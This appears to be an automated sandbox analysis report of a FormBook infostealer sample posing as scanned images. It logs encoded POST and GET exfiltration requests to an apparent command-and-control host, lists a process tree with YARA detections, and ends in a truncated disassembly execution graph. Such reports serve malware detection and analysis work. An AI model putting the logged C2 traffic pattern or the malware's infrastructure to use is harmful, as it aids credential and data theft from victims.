                                                      Data Raw: 64 5a 6f 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 69 63 61 45 74 47 79 59 6d 31 6d 61 35 73 79 53 53 33 41 73 55 7a 38 36 36 6b 4b 64 64 4e 65 45 77 5a 58 70 57 58 43 49 50 48 50 31 6e 58 51 35 63 49 38 38 79 76 65 56 77 47 44 49 78 70 65 6c 68 65 76 35 75 69 35 55 34 62 6c 51 75 42 45 70 6e 59 58 53 66 47 72 53 43 6a 6f 2b 37 37 4f 72 46 6e 59 31 49 55 75 46 5a 58 78 44 71 79 6b 6b 50 35 62 49 67 49 6a 4e 58 4b 7a 6d 43 36 4e 56 35 6e 63 4a 4d 73 57 68 4d 6d 56 6d 79 6e 72 69 37 58 64 4c 44 33 69 39 5a 64 77 51 2f 65 79 59 59 6e 31 41 4a 76 51 5a 51 76 48 77 59 62 57 36
                                                      Data Ascii: dZo=LugYlboQcaRDicaEtGyYm1ma5sySS3AsUz866kKddNeEwZXpWXCIPHP1nXQ5cI88yveVwGDIxpelhev5ui5U4blQuBEpnYXSfGrSCjo+77OrFnY1IUuFZXxDqykkP5bIgIjNXKzmC6NV5ncJMsWhMmVmynri7XdLD3i9ZdwQ/eyYYn1AJvQZQvHwYbW6


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.954156116.213.43.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:28:02.324917078 CEST716OUTPOST /yxos/ HTTP/1.1
                                                      Host: www.lfghtko.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lfghtko.lol
                                                      Referer: http://www.lfghtko.lol/yxos/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 6a 39 4b 45 69 48 79 59 75 31 6d 64 38 73 79 53 62 58 41 53 55 7a 67 36 36 6b 69 7a 64 2f 36 45 77 35 6e 70 58 57 43 49 49 48 50 31 76 33 51 34 44 34 38 6e 79 76 53 73 77 48 2f 49 78 6f 36 6c 68 63 6e 35 74 52 52 54 36 4c 6c 4f 37 52 45 72 34 49 58 53 66 47 72 53 43 6e 4a 6a 37 34 2b 72 46 57 6f 31 4f 31 75 45 48 48 78 45 74 79 6b 6b 4c 35 62 54 67 49 6a 76 58 49 58 4d 43 34 31 56 35 6d 73 4a 4c 2b 2b 75 47 6d 56 73 39 48 71 4f 37 32 4d 73 45 33 71 63 59 37 52 77 6c 74 2b 6f 66 47 56 65 59 64 5a 43 46 34 48 58 66 38 66 53 65 7a 52 50 59 55 49 39 48 64 6e 31 6d 61 75 75 7a 62 53 6c 72 51 3d 3d
                                                      Data Ascii: dZo=LugYlboQcaRDj9KEiHyYu1md8sySbXASUzg66kizd/6Ew5npXWCIIHP1v3Q4D48nyvSswH/Ixo6lhcn5tRRT6LlO7REr4IXSfGrSCnJj74+rFWo1O1uEHHxEtykkL5bTgIjvXIXMC41V5msJL++uGmVs9HqO72MsE3qcY7Rwlt+ofGVeYdZCF4HXf8fSezRPYUI9Hdn1mauuzbSlrQ==


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      47192.168.2.954157116.213.43.19080
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:28:06.481605053 CEST1729OUTPOST /yxos/ HTTP/1.1
                                                      Host: www.lfghtko.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lfghtko.lol
                                                      Referer: http://www.lfghtko.lol/yxos/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 6a 39 4b 45 69 48 79 59 75 31 6d 64 38 73 79 53 62 58 41 53 55 7a 67 36 36 6b 69 7a 64 2f 79 45 77 4b 76 70 58 31 71 49 4a 48 50 31 6c 58 51 44 44 34 38 6d 79 73 69 6f 77 48 7a 32 78 71 79 6c 67 2f 2f 35 6f 67 52 54 67 62 6c 4f 6b 68 45 6f 6e 59 58 48 66 43 50 57 43 6a 74 6a 37 34 2b 72 46 56 77 31 4e 6b 75 45 46 48 78 44 71 79 6b 34 50 35 61 64 67 49 36 53 58 49 43 37 43 4d 4a 56 35 46 55 4a 4e 4c 4b 75 4b 6d 56 69 38 48 71 57 37 32 41 7a 45 33 6d 6d 59 2f 51 62 6c 74 47 6f 62 6a 70 64 4c 2f 4e 56 65 5a 48 30 5a 73 50 58 65 46 51 6d 58 6e 70 4b 51 74 6e 4e 32 6f 76 52 36 34 50 7a 35 5a 64 79 44 73 2f 4e 73 47 50 67 6e 34 78 35 78 75 4d 39 5a 67 45 36 6a 7a 45 46 45 65 48 6d 67 51 30 4f 31 34 68 6e 46 33 49 35 75 71 74 41 6d 7a 37 68 67 73 41 36 6d 64 56 75 4a 49 48 30 4c 34 45 56 46 6b 54 6e 61 59 78 58 49 49 46 38 57 4b 4b 44 41 6c 43 68 7a 4d 71 33 63 70 50 47 72 59 32 4c 61 2f 4e 48 51 2b 6b 4a 63 42 33 51 2f 38 34 36 38 58 57 6a 7a 6c 53 68 59 7a [TRUNCATED]
                                                      Data Ascii: dZo=LugYlboQcaRDj9KEiHyYu1md8sySbXASUzg66kizd/yEwKvpX1qIJHP1lXQDD48mysiowHz2xqylg//5ogRTgblOkhEonYXHfCPWCjtj74+rFVw1NkuEFHxDqyk4P5adgI6SXIC7CMJV5FUJNLKuKmVi8HqW72AzE3mmY/QbltGobjpdL/NVeZH0ZsPXeFQmXnpKQtnN2ovR64Pz5ZdyDs/NsGPgn4x5xuM9ZgE6jzEFEeHmgQ0O14hnF3I5uqtAmz7hgsA6mdVuJIH0L4EVFkTnaYxXIIF8WKKDAlChzMq3cpPGrY2La/NHQ+kJcB3Q/8468XWjzlShYzoo/QkShJqagWNbaqZ/oqNid4cgGRT/Bstlxxnwx3xUAGtmCtW+nXUT/ZDixy6b72PxjSDRvXU9hA0L+O5t+hbNpNUgoyoGHbXTjgg02luxRVO/N1awMzWXbSvNMmoHS9l+FNQt8AkKD7CzHTRHhhHJwuI2tdA0Lg0z0gs4DQg8SjoB0SC2fu9fTCEfo4b/XxQESckANTWGvneA+z3mQUGwHT81x1fx5A0jORAhwkxo9RFJyW6eftfey6z/YAMRiL6tNSO2EWrVGD6MJHh/XssmQFvNnH2OddadY72YjPWkf0jVG4d/cfKkJtUEL0RE3dIwNTI/6L4LcCIum9Yc6D3fhb9soNocZ1LZl/+rylQA18FYW7J4JxjkMeBf5P6b+8f/Lgs9EkSWMIe0RWnj/X57zwUEWx2r+F1F0JLd4719a0pZK4ICy+CSYSBXh7q1Y7vwCgK6f8SfoG1rwgbToHcyGwNsyNJlHsyRve0CVJxp1OXWmXOfJbLKaHr99c6DDD3ve8g5EcqOpcdpXE6JaEfON91bs47lkW7qgUGqSZGka6JnRJEXjG6G3R1SdwRG4mq8DNImc7znHdvCicp5t+ZVi7IFBdOHeade/F18BoWqUs1FYQ4yQB9peKyktTg13OWPNlBDJZsac62rm+jNRYRCp1X6MsOVw5bP [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      48192.168.2.954158116.213.43.19080
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:28:09.012103081 CEST437OUTGET /yxos/?dZo=GsI4mtIQVr1bqd+WnFq+jxjWo9OGL2g8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR3g5VMmjRWjtblZDXQIQIDqIzGBnVicw==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.lfghtko.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:12:23:56
                                                      Start date:18/08/2024
                                                      Path:C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
                                                      Imagebase:0xa20000
                                                      File size:1'211'904 bytes
                                                      MD5 hash:58077F7B69CA6E33EC9A13F1B2B53C02
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:12:23:57
                                                      Start date:18/08/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
                                                      Imagebase:0x60000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:12:24:18
                                                      Start date:18/08/2024
                                                      Path:C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe"
                                                      Imagebase:0x460000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:9
                                                      Start time:12:24:20
                                                      Start date:18/08/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                      Imagebase:0x330000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:10
                                                      Start time:12:24:33
                                                      Start date:18/08/2024
                                                      Path:C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe"
                                                      Imagebase:0x460000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:12
                                                      Start time:12:24:45
                                                      Start date:18/08/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff73feb0000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.7%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:5.1%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:164
                                                        execution_graph 99018 a60226 99027 a2ade2 Mailbox 99018->99027 99020 a60c86 99035 a766f4 59 API calls Mailbox 99020->99035 99022 a60c8f 99024 a600e0 VariantClear 99024->99027 99025 a2b6c1 99034 a8a0b5 89 API calls 4 library calls 99025->99034 99027->99020 99027->99022 99027->99024 99027->99025 99029 a9e237 99027->99029 99032 a29df0 59 API calls Mailbox 99027->99032 99033 a77405 59 API calls 99027->99033 99036 a9cdf1 99029->99036 99031 a9e247 99031->99027 99032->99027 99033->99027 99034->99020 99035->99022 99074 a29997 99036->99074 99040 a9d242 99142 a9dbdc 92 API calls Mailbox 99040->99142 99043 a9ce75 Mailbox 99043->99031 99044 a9cec6 Mailbox 99044->99043 99047 a29997 84 API calls 99044->99047 99061 a9d0cd 99044->99061 99124 a8f835 59 API calls 2 library calls 99044->99124 99125 a9d2f3 61 API calls 2 library calls 99044->99125 99045 a9d251 99046 a9d0db 99045->99046 99048 a9d25d 99045->99048 99105 a9cc82 99046->99105 99047->99044 99048->99043 99053 a9d114 99120 a40e48 99053->99120 99056 a9d12e 99126 a8a0b5 89 API calls 4 library calls 99056->99126 99057 a9d147 99127 a2942e 99057->99127 99060 a9d139 GetCurrentProcess TerminateProcess 99060->99057 99061->99040 99061->99046 99066 a9d2b8 99066->99043 99070 a9d2cc FreeLibrary 99066->99070 99067 a9d17f 99139 a9d95d 107 API calls _free 99067->99139 99070->99043 99072 a9d190 99072->99066 99140 a28ea0 59 API calls Mailbox 99072->99140 99141 a29e9c 60 API calls Mailbox 99072->99141 99143 a9d95d 107 API calls _free 99072->99143 99075 a299ab 99074->99075 99076 a299b1 99074->99076 99075->99043 99092 a9dab9 99075->99092 99077 a5f9fc __i64tow 99076->99077 99078 a299f9 99076->99078 99080 a299b7 __itow 99076->99080 99084 a5f903 99076->99084 99158 a438d8 83 API calls 4 library calls 99078->99158 99144 a40ff6 99080->99144 99083 a299d1 99083->99075 99154 a27f41 99083->99154 99085 a40ff6 Mailbox 59 API calls 99084->99085 99090 a5f97b Mailbox _wcscpy 99084->99090 99087 a5f948 99085->99087 99088 a40ff6 Mailbox 59 API calls 99087->99088 99089 a5f96e 99088->99089 99089->99090 99091 a27f41 59 API calls 99089->99091 99159 a438d8 83 API calls 4 library calls 99090->99159 99091->99090 99188 a27faf 99092->99188 99094 a9dad4 CharLowerBuffW 99192 a7f658 99094->99192 99101 a9db24 99217 a27e8c 99101->99217 99102 a9db6c Mailbox 99102->99044 99104 a9db30 Mailbox 99104->99102 99221 a9d2f3 61 API calls 2 library calls 99104->99221 99106 a9cc9d 99105->99106 99107 a9ccf2 99105->99107 99108 a40ff6 Mailbox 59 API calls 99106->99108 99111 a9dd64 99107->99111 99110 a9ccbf 99108->99110 99109 a40ff6 Mailbox 59 API calls 99109->99110 99110->99107 99110->99109 99112 a9df8d Mailbox 99111->99112 99119 a9dd87 _strcat _wcscpy __NMSG_WRITE 99111->99119 99112->99053 99113 a29cf8 59 API calls 99113->99119 99114 a29d46 59 API calls 99114->99119 99115 a29c9c 59 API calls 99115->99119 99116 a29997 84 API calls 99116->99119 99117 a4594c 58 API calls __crtCompareStringA_stat 99117->99119 99119->99112 99119->99113 99119->99114 99119->99115 99119->99116 99119->99117 99228 a85b29 61 API calls 2 library calls 99119->99228 99122 a40e5d 99120->99122 99121 a40ef5 VirtualAlloc 99123 a40ec3 99121->99123 99122->99121 99122->99123 99123->99056 99123->99057 99124->99044 99125->99044 99126->99060 99128 a29436 99127->99128 99129 a40ff6 Mailbox 59 API calls 99128->99129 99130 a29444 99129->99130 99131 a29450 99130->99131 99229 a2935c 59 API calls Mailbox 99130->99229 99133 a291b0 99131->99133 99230 a292c0 99133->99230 99135 a40ff6 Mailbox 59 API calls 99136 a2925b 99135->99136 99136->99072 99138 a28ea0 59 API calls Mailbox 99136->99138 99137 a291bf 99137->99135 99137->99136 99138->99067 99139->99072 99140->99072 99141->99072 99142->99045 99143->99072 99146 a40ffe 99144->99146 99147 a41018 99146->99147 99149 a4101c std::exception::exception 99146->99149 99160 a4594c 99146->99160 99177 a435e1 DecodePointer 99146->99177 99147->99083 99178 a487db RaiseException 99149->99178 99151 a41046 99179 a48711 58 API calls _free 99151->99179 99153 a41058 99153->99083 99155 a27f50 __NMSG_WRITE _memmove 99154->99155 99156 a40ff6 Mailbox 59 API calls 99155->99156 99157 a27f8e 99156->99157 99157->99075 99158->99080 99159->99077 99161 a459c7 99160->99161 99173 a45958 99160->99173 99186 a435e1 DecodePointer 99161->99186 99163 a459cd 99187 a48d68 58 API calls __getptd_noexit 99163->99187 99166 a4598b RtlAllocateHeap 99166->99173 99176 a459bf 99166->99176 99168 a459b3 99184 a48d68 58 API calls __getptd_noexit 99168->99184 99172 a45963 99172->99173 99180 a4a3ab 58 API calls __NMSG_WRITE 99172->99180 99181 a4a408 58 API calls 5 library calls 99172->99181 99182 a432df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99172->99182 99173->99166 99173->99168 99173->99172 99174 a459b1 99173->99174 99183 a435e1 DecodePointer 99173->99183 99185 a48d68 58 API calls __getptd_noexit 99174->99185 99176->99146 99177->99146 99178->99151 99179->99153 99180->99172 99181->99172 99183->99173 99184->99174 99185->99176 99186->99163 99187->99176 99189 a27fc2 99188->99189 99191 a27fbf _memmove 99188->99191 99190 a40ff6 Mailbox 59 API calls 99189->99190 99190->99191 99191->99094 99193 a7f683 __NMSG_WRITE 99192->99193 99194 a7f6c2 99193->99194 99195 a7f6b8 99193->99195 99198 a7f769 99193->99198 99194->99104 99199 a277c7 99194->99199 99195->99194 99222 a27a24 61 API calls 99195->99222 99198->99194 99223 a27a24 61 API calls 99198->99223 99200 a40ff6 Mailbox 59 API calls 99199->99200 99201 a277e8 99200->99201 99202 a40ff6 Mailbox 59 API calls 99201->99202 99203 a277f6 99202->99203 99204 a279ab 99203->99204 99205 a27a17 99204->99205 99206 a279ba 99204->99206 99207 a27e8c 59 API calls 99205->99207 99206->99205 99208 a279c5 99206->99208 99213 a279e8 _memmove 99207->99213 99209 a279e0 99208->99209 99210 a5ef32 99208->99210 99224 a28087 59 API calls Mailbox 99209->99224 99225 a28189 99210->99225 99213->99101 99214 a5ef3c 99215 a40ff6 Mailbox 59 API calls 99214->99215 99216 a5ef5c 99215->99216 99218 a27ea3 _memmove 99217->99218 99219 a27e9a 99217->99219 99218->99104 99219->99218 99220 a27faf 59 API calls 99219->99220 99220->99218 99221->99102 99222->99195 99223->99198 99224->99213 99226 a40ff6 Mailbox 59 API calls 99225->99226 99227 a28193 99226->99227 99227->99214 99228->99119 99229->99131 99231 a292c9 Mailbox 99230->99231 99232 a5f5c8 99231->99232 99237 a292d3 99231->99237 99233 a40ff6 Mailbox 59 API calls 99232->99233 99235 a5f5d4 99233->99235 99234 a292da 99234->99137 99237->99234 99238 a29df0 59 API calls Mailbox 99237->99238 99238->99237 99239 a23633 99240 a2366a 99239->99240 99241 a236e7 99240->99241 99242 a23688 99240->99242 99279 a236e5 99240->99279 99244 a5d31c 99241->99244 99245 a236ed 99241->99245 99246 a23695 99242->99246 99247 a2375d PostQuitMessage 99242->99247 99243 a236ca DefWindowProcW 99281 a236d8 99243->99281 99289 a311d0 10 API calls Mailbox 99244->99289 99248 a236f2 99245->99248 99249 a23715 SetTimer RegisterWindowMessageW 99245->99249 99250 a236a0 99246->99250 99251 a5d38f 99246->99251 99247->99281 99253 a5d2bf 99248->99253 99254 a236f9 KillTimer 99248->99254 99255 a2373e CreatePopupMenu 99249->99255 99249->99281 99256 a23767 99250->99256 99257 a236a8 99250->99257 99304 a82a16 71 API calls _memset 99251->99304 99261 a5d2c4 99253->99261 99262 a5d2f8 MoveWindow 99253->99262 99284 a244cb Shell_NotifyIconW _memset 99254->99284 99255->99281 99287 a24531 64 API calls _memset 99256->99287 99264 a5d374 99257->99264 99265 a236b3 99257->99265 99259 a5d343 99290 a311f3 341 API calls Mailbox 99259->99290 99269 a5d2e7 SetFocus 99261->99269 99270 a5d2c8 99261->99270 99262->99281 99264->99243 99303 a7817e 59 API calls Mailbox 99264->99303 99272 a2374b 99265->99272 99273 a236be 99265->99273 99266 a5d3a1 99266->99243 99266->99281 99268 a2375b 99268->99281 99269->99281 99270->99273 99274 a5d2d1 99270->99274 99271 a2370c 99285 a23114 DeleteObject DestroyWindow Mailbox 99271->99285 99286 a245df 81 API calls _memset 99272->99286 99273->99243 99291 a244cb Shell_NotifyIconW _memset 99273->99291 99288 a311d0 10 API calls Mailbox 99274->99288 99279->99243 99282 a5d368 99292 a243db 99282->99292 99284->99271 99285->99281 99286->99268 99287->99268 99288->99281 99289->99259 99290->99273 99291->99282 99293 a24406 _memset 99292->99293 99305 a24213 99293->99305 99296 a2448b 99298 a244c1 Shell_NotifyIconW 99296->99298 99299 a244a5 Shell_NotifyIconW 99296->99299 99300 a244b3 99298->99300 99299->99300 99309 a2410d 99300->99309 99302 a244ba 99302->99279 99303->99279 99304->99266 99306 a24227 99305->99306 99307 a5d638 99305->99307 99306->99296 99331 a83226 62 API calls _W_store_winword 99306->99331 99307->99306 99308 a5d641 DestroyIcon 99307->99308 99308->99306 99310 a24200 Mailbox 99309->99310 99311 a24129 99309->99311 99310->99302 99332 a27b76 99311->99332 99314 a24144 99337 a27d2c 99314->99337 99315 a5d5dd LoadStringW 99317 a5d5f7 99315->99317 99319 a27c8e 59 API calls 99317->99319 99318 a24159 99318->99317 99320 a2416a 99318->99320 99325 a5d601 99319->99325 99321 a24174 99320->99321 99322 a24205 99320->99322 99346 a27c8e 99321->99346 99355 a281a7 99322->99355 99327 a2417e _memset _wcscpy 99325->99327 99359 a27e0b 99325->99359 99329 a241e6 Shell_NotifyIconW 99327->99329 99328 a5d623 99330 a27e0b 59 API calls 99328->99330 99329->99310 99330->99327 99331->99296 99333 a40ff6 Mailbox 59 API calls 99332->99333 99334 a27b9b 99333->99334 99335 a28189 59 API calls 99334->99335 99336 a24137 99335->99336 99336->99314 99336->99315 99338 a27da5 99337->99338 99339 a27d38 __NMSG_WRITE 99337->99339 99340 a27e8c 59 API calls 99338->99340 99341 a27d73 99339->99341 99342 a27d4e 99339->99342 99345 a27d56 _memmove 99340->99345 99344 a28189 59 API calls 99341->99344 99366 a28087 59 API calls Mailbox 99342->99366 99344->99345 99345->99318 99347 a5f094 99346->99347 99348 a27ca0 99346->99348 99373 a78123 59 API calls _memmove 99347->99373 99367 a27bb1 99348->99367 99351 a27cac 99351->99327 99352 a5f09e 99353 a281a7 59 API calls 99352->99353 99354 a5f0a6 Mailbox 99353->99354 99356 a281b2 99355->99356 99357 a281ba 99355->99357 99374 a280d7 59 API calls 2 library calls 99356->99374 99357->99327 99360 a5f173 99359->99360 99361 a27e1f 99359->99361 99362 a28189 59 API calls 99360->99362 99375 a27db0 99361->99375 99365 a5f17e __NMSG_WRITE _memmove 99362->99365 99364 a27e2a 99364->99328 99366->99345 99368 a27bbf 99367->99368 99372 a27be5 _memmove 99367->99372 99369 a40ff6 Mailbox 59 API calls 99368->99369 99368->99372 99370 a27c34 99369->99370 99371 a40ff6 Mailbox 59 API calls 99370->99371 99371->99372 99372->99351 99373->99352 99374->99357 99376 a27dbf __NMSG_WRITE 99375->99376 99377 a28189 59 API calls 99376->99377 99378 a27dd0 _memmove 99376->99378 99379 a5f130 _memmove 99377->99379 99378->99364 99380 a21016 99385 a24ad2 99380->99385 99386 a40ff6 Mailbox 59 API calls 99385->99386 99387 a24ada 99386->99387 99388 a2101b 99387->99388 99395 a24a94 99387->99395 99392 a42f80 99388->99392 99431 a42e84 99392->99431 99394 a21025 99396 a24aaf 99395->99396 99397 a24a9d 99395->99397 99399 a24afe 99396->99399 99398 a42f80 __cinit 67 API calls 99397->99398 99398->99396 99400 a277c7 59 API calls 99399->99400 99401 a24b16 GetVersionExW 99400->99401 99402 a27d2c 59 API calls 99401->99402 99403 a24b59 99402->99403 99404 a27e8c 59 API calls 99403->99404 99412 a24b86 99403->99412 99405 a24b7a 99404->99405 99427 a27886 99405->99427 99407 a24bf1 GetCurrentProcess IsWow64Process 99408 a24c0a 99407->99408 99409 a24c20 99408->99409 99410 a24c89 GetSystemInfo 99408->99410 99423 a24c95 99409->99423 99414 a24c56 99410->99414 99411 a5dc8d 99412->99407 99412->99411 99414->99388 99416 a24c32 99418 a24c95 2 API calls 99416->99418 99417 a24c7d GetSystemInfo 99419 a24c47 99417->99419 99420 a24c3a GetNativeSystemInfo 99418->99420 99419->99414 99421 a24c4d FreeLibrary 99419->99421 99420->99419 99421->99414 99424 a24c2e 99423->99424 99425 a24c9e LoadLibraryA 99423->99425 99424->99416 99424->99417 99425->99424 99426 a24caf GetProcAddress 99425->99426 99426->99424 99428 a27894 99427->99428 99429 a27e8c 59 API calls 99428->99429 99430 a278a4 99429->99430 99430->99412 99432 a42e90 _doexit 99431->99432 99439 a43457 99432->99439 99438 a42eb7 _doexit 99438->99394 99456 a49e4b 99439->99456 99441 a42e99 99442 a42ec8 DecodePointer DecodePointer 99441->99442 99443 a42ef5 99442->99443 99444 a42ea5 99442->99444 99443->99444 99502 a489e4 59 API calls 2 library calls 99443->99502 99453 a42ec2 99444->99453 99446 a42f58 EncodePointer EncodePointer 99446->99444 99447 a42f07 99447->99446 99448 a42f2c 99447->99448 99503 a48aa4 61 API calls 2 library calls 99447->99503 99448->99444 99452 a42f46 EncodePointer 99448->99452 99504 a48aa4 61 API calls 2 library calls 99448->99504 99451 a42f40 99451->99444 99451->99452 99452->99446 99505 a43460 99453->99505 99457 a49e5c 99456->99457 99458 a49e6f EnterCriticalSection 99456->99458 99463 a49ed3 99457->99463 99458->99441 99460 a49e62 99460->99458 99487 a432f5 58 API calls 3 library calls 99460->99487 99464 